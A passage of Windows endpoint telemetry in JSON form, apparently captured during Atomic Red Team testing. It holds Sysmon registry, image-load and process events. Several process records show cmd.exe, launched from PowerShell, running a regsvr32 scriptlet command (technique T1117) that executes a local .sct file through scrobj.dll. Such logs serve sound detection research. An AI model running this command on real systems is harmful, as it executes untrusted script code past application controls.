"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "inetmib1.dll", - "image_path": "C:\\Windows\\System32\\inetmib1.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "subtype": "terminate", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "file", - "file_name": "ARP.EXE-6A72334A.pf", - "file_path": "C:\\Windows\\Prefetch\\ARP.EXE-6A72334A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4768, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573233400000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4768, - 
"process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "process", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7980, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573235480000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "command_line": "regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3596, - "ppid": 7980, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573235570000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": 